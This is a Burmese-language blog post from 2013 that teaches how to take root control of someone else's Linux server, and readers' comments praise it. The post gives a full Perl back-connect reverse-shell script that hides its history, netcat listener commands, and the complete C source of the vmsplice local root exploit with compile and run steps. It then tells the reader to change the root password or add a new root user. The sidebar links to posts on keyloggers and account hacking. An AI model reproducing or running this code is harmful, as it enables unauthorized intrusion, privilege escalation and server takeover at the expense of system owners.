ပထမဆံုးအေနနဲ ့Root လုပ္မယ့္ Target Server ေပၚမွာ သင့္ရဲ ့ php shell ကို တစ္နည္းနည္းနဲ ့တင္ထားျပီးသားရွိဖို ့လိုအပ္ပါတယ္။
တကယ္လို ့သင့္မွာသာ permission ရွိျပီးသားဆိုရင္ေတာ့ butt.pl ဆိုတဲ ့new file တစ္ခု create လုပ္ရပါမယ္။
( permission မရေသးရင္ေတာ့ Perl scrip ကို PHP inclusion နဲ ့execute လုပ္လို ့ရပါတယ္ အဲ့လိုလုပ္တဲ့နည္းကိုလဲ ေနာက္သပ္သပ္ ကြ်န္ေတာ္ tutorial ေရးေပးပါ့မယ္ )
ခုနက အသစ္ create လုပ္ထားတဲ့ butt.pl ထဲမွာထည့္ရမယ့္ code ေတြကေတာ့
#!/usr/bin/perl use IO::Socket; $system = '/bin/bash'; $ARGC=@ARGV; print "IHS BACK-CONNECT BACKDOOR\n\n"; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n"; print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n"; print "[*] Connected to remote host \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "IHS BACK-CONNECT BACKDOOR \n\n"; system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); system($system); #EOF
ျပီးရင္ေတာ့ သင့္ Router ထဲကေန Port 8080 ကို forward လုပ္လုိက္ပါ။
ေအာက္က command ကို အသံုးျပဳျပီးေတာ့ shell ကို execute လုပ္ပါ။
ဒါမွမဟုတ္ php script သံုးမယ္ဆိုရင္ေတာ့ script ကို run လုိက္ပါ။
(မွတ္ခ်က္။ ။ php script သံုးမယ္ဆိုရင္ေတာ့ system ကို point လုပ္ဖို ့ script ကို manually change ေပးရမွာျဖစ္ပါတယ္။)
perl butts.pl 192.168.0.254 8080
IP Address ကို သင့္ IP သို ့ေျပာင္းလိုက္ပါ။
ျပီးရင္ေတာ့ terminal ကိုဖြင့္ျပီး ေအာက္က command ကို အသံုးျပဳရပါမယ္။
( Netcat ကိုေတာ့ install လုပ္ဖို ့လိုအပ္ပါမယ္ )
nc -vv -l -n -p 8080
connect လုပ္လို ့ရ မရဆိုတာ ေသခ်ာဖို ့"uname -a;id" ဆိုတဲ့ command ကို သံုးျပီး confirm လုပ္ရပါ့မယ္။ ဒါဆိုရင္ေတာ့ kernel information ကို ရရွိမွာျဖစ္ျပီး အဲ့ info ကို အသံုးခ်ျပီး root လုပ္လုိ ့ရပါျပီ။
ဒီအဆင့္မွာေတာ့ exploit ကို compile လုပ္ဖို ့လိုအပ္လာပါျပီ။ Linux Server အမ်ားစုက compilers ေတြ ကို disable လုပ္ထားေလ့ရွိပါတယ္။ ဒါေၾကာင့္ ကိုယ့္ computer ကေန compile လုပ္ရမွာျဖစ္ပါတယ္။
သတိျပဳဖို ့အေရးၾကီးတာက Window OS ကေနျပီး cross compile လုပ္လို ့မရဘူးဆိုတာပါပဲ။
Linux OS တစ္ခုခု ကေနပဲ compile လုပ္လို ့ရမွာပဲျဖစ္ပါတယ္။
ေအာက္မွာ က်ေနာ္ ျပမယ့္ exploit ဟာ kernel ေတာ္ေတာ္မ်ားမ်ားမွာ 100% အလုပ္လုပ္ပါတယ္။
text file တစ္ခု ဖြင့္ျပီး ေအာက္မွာေဖာ္ျပထားတဲ့ code ကို copy/paste လုပ္ျပီး dongs.c ဆိုျပီး save လုပ္လုိက္ပါ။
#define _GNU_SOURCE #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <malloc.h> #include <limits.h> #include <signal.h> #include <unistd.h> #include <sys/uio.h> #include <sys/mman.h> #include <asm/page.h> #define __KERNEL__ #include <asm/unistd.h> #define PIPE_BUFFERS 16 #define PG_compound 14 #define uint unsigned int #define static_inline static inline __attribute__((always_inline)) #define STACK(x) (x + sizeof(x) - 40) struct page { unsigned long flags; int count; int mapcount; unsigned long private; void *mapping; unsigned long index; struct { long next, prev; } lru; }; void exit_code(); char exit_stack[1024 * 1024]; void die(char *msg, int err) { printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); fflush(stdout); fflush(stderr); exit(1); } #if defined (__i386__) #ifndef __NR_vmsplice #define __NR_vmsplice 316 #endif #define USER_CS 0x73 #define USER_SS 0x7b #define USER_FL 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "movl %0, 0x10(%%esp) ;" "movl %1, 0x0c(%%esp) ;" "movl %2, 0x08(%%esp) ;" "movl %3, 0x04(%%esp) ;" "movl %4, 0x00(%%esp) ;" "iret" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } static_inline void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movl %%esp, %%eax ;" "andl %1, %%eax ;" "movl (%%eax), %0" : "=r" (curr) : "i" (~8191) ); return (void *) curr; } #elif defined (__x86_64__) #ifndef __NR_vmsplice #define __NR_vmsplice 278 #endif #define USER_CS 0x23 #define USER_SS 0x2b #define USER_FL 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "swapgs ;" "movq %0, 0x20(%%rsp) ;" "movq %1, 0x18(%%rsp) ;" "movq %2, 0x10(%%rsp) ;" "movq %3, 0x08(%%rsp) ;" "movq %4, 0x00(%%rsp) ;" "iretq" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } static_inline void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movq %%gs:(0), %0" : "=r" (curr) ); return (void *) curr; } #else #error "unsupported arch" #endif #if defined (_syscall4) #define __NR__vmsplice __NR_vmsplice _syscall4( long, _vmsplice, int, fd, struct iovec *, iov, unsigned long, nr_segs, unsigned int, flags) #else #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) #endif static uint uid, gid; void kernel_code() { int i; uint *p = get_current(); for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[0]); printf("[+] page: 0x%lx\n", pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0]; pages[0]->count = 1; pages[1]->lru.next = (long) kernel_code; /*****/ pages[2] = *(void **) pages[0]; pages[3] = pages[2] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[2]); printf("[+] page: 0x%lx\n", pages[3]); pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2]; pages[2]->count = 1; pages[3]->lru.next = (long) kernel_code; /*****/ pages[4] = *(void **) &(int[2]){PAGE_SIZE,0}; map_size = PAGE_SIZE; map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[4]); /*****/ map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE; map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); /*****/ map_size -= 2 * PAGE_SIZE; if (munmap(map_addr + map_size, PAGE_SIZE) < 0) die("munmap", errno); /*****/ if (pipe(pi) < 0) die("pipe", errno); close(pi[0]); iov.iov_base = map_addr; iov.iov_len = ULONG_MAX; signal(SIGPIPE, exit_code); _vmsplice(pi[1], &iov, 1, 0); die("vmsplice", errno); return 0; }
ေနာက္ထပ္ Terminal အသစ္တစ္ခုထပ္ဖြင့္ျပီး ဒီ command ကို ရိုက္လိုက္ပါ။
gcc dongs.c -o dongs
ျပီးရင္ေတာ့ ခုနက save လုပ္ထားတဲ့ dongs ဆိုတဲ့ txt file ကို server ထဲက PHP Shell ေပၚကို upload လုပ္လိုက္ပါ။
ဒီအဆင့္ျပီးရင္ေတာ့ Terminal ကို ျပန္သြားျပီး Netcat ကို လဲ connect လုပ္ထားျပီးရင္ေတာ့ ေအာက္ကေပးထားတဲ့ code ကို ရိုက္ထည့္လိုက္ပါ။
./dongs
ဒါဆိုရင္ေတာ့ exploit ဟာ ေကာင္းေကာင္းအလုပ္လုပ္ျပီး သင့္ကို root access ရရွိေစမွာျဖစ္ပါတယ္။
ေနာက္ဆံုးအဆင့္အေနနဲ ့ root password ကို change ဖို ့ "passwd root" ဆိုတဲ့ command ကိုအသံုးျပဳျပီးေတာ့ ေျပာင္းခ်င္ေျပာင္း ဒါမွမဟုတ္ new root user ဆိုျပီး အသစ္ create ထပ္လုပ္ရင္လုပ္လိုက္ပါ။
ဒါဆိုရင္ေတာ့ Linux Server တစ္ခုကို Root လုပ္လုိ ့ျပီးသြားျပီျဖစ္ပါတယ္။
Friday, June 28, 2013
//
Labels:
Hacking Tutorial
//
5
comments
//
5 comments to "Linux Sever တစ္ခုကို ဘယ္လို Root လုပ္မလဲ"
Post a Comment
သင့္ရဲ ့ comment မ်ားက ကြ်န္ေတာ္တို႔လို blogger ေတြ အတြက္ အားေဆးတစ္ခြက္ပါ။
ေကာင္းသည္၊ ဆုိးသည္ ေရးႏုိင္ပါသည္။ လိုအပ္သည္မ်ားကိုလည္းေဝဖန္အၾကံေပးႏုိင္ပါသည္။
Powered by Blogger.
Respect List
Blink Hacker Group
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Categories
@Lph@ blog ကို Android Devices ေတြေပၚကဖတ္ခ်င္ရင္
Link list 1
- Application (1)
- E-book (2)
- Facebook Tips & Tricks (2)
- Hacking Tutorial (37)
- HTML (2)
- Kali Linux (6)
- Mobile Tips & Tricks (5)
- Myanmar Cyber Army (1)
Popular Posts
-
SQL Map ကို Python နဲ ့ develop လုပ္ထားျပီးေတာ့ Backtrack 5, Backtrack 5 R1 အပါအ၀င္ Backtrack Version အားလံုးမွာ ပါ၀င္တဲ့ အေကာင္းဆံုး SQ...
-
လူေတာ္ေတာ္မ်ားမ်ား သိထားၾကတာက hacking တို ့ pentesting တို ့ကို computer ကေနပဲလုပ္လို ့ရတယ္လို ့ထင္ေနၾကတယ္ဗ်။ တကယ္တန္းေတာ့ Android ဖု...
-
ဒီနည္းေလးက အဆင့္ရွိတဲ့နည္းေလးတစ္ခုေတာ့မဟုတ္ပါဘူး ၾဆာသမားေတြ အတြက္ေတာ့ ကေလးအထာေလးေတြပါ။ ဒါေပမယ့္ Hacking ကို ေလ့လာကာစ လူေတြအတြက္ေတာ့ န...
Followers
စည္းလုံးျခင္းသံစဥ္ေရဒီယုိ
Blog Archive
-
▼
2013
(56)
-
▼
June
(26)
- Android Bot Maker
- How to get someone IP Address
- Linux Sever တစ္ခုကို ဘယ္လို Root လုပ္မလဲ
- USB drive အသံုးျပဳျပီး Password မ်ားခိုးယူျခင္း
- Rooting A Server
- Inserting Keylogger Code in Android SwiftKey Using...
- Android Keylogger
- Firewall ကို Back Door / Trojan Virus ႏွင့္ ခ်ိဳးေ...
- Basic Spreading Method
- WordPress ရဲ ့ Zer0 Day Exploit
- Website Admin Panel ကို အလြယ္ကူဆံုး hack နည္း
- Hacking Paypal Accounts
- Hacking Joomla Sites
- DNN Method - Website Hacking
- Protect your Facebook account from hackers with My...
- Hack Wordpress Blogs
- Hack Unsecured Webcams
- How to secure your server from PHP Shells!
- HTML ဆုိတာဘာလဲ ?
- HTML မိတ္ဆက္
- IIS Exploit - Easiest way to deface Website [Windo...
- Hack YAHOO IDs by Brute Force Attack
- SMS Spoffer
- Hack / Bypass .asp sites using SQL Injection
- Hacking 800 Collection
- Blog ရဲ ့ရည္ရြယ္ခ်က္
-
▼
June
(26)
Anonymous says:
ျကိုက္တယ္ ဂ်ာ
newbie says:
wow!! great!thanks for sharing
I didnt see before such a nice rooting tutorial :D
Ko Alpha says:
sexy bitch ကလည္း လာေနာက္ေနျပန္ျပီ နင္တို ့အတြက္ေတာ့ ငါ့ tuto က ႏြားေရွ ့ထြန္ၾကဴး သလို ျဖစ္ေနမွာေပါ့
:P
Unknown says:
ကၽြန္ေတာ္ linux ကို ဒီဘေလာ့ကေနပဲ သင္ခ်င္ပါတယ္ အဆင္ေျပႏိုင္မလား ခင္ဗ်ာ။
Unknown says:
Thank you so much bro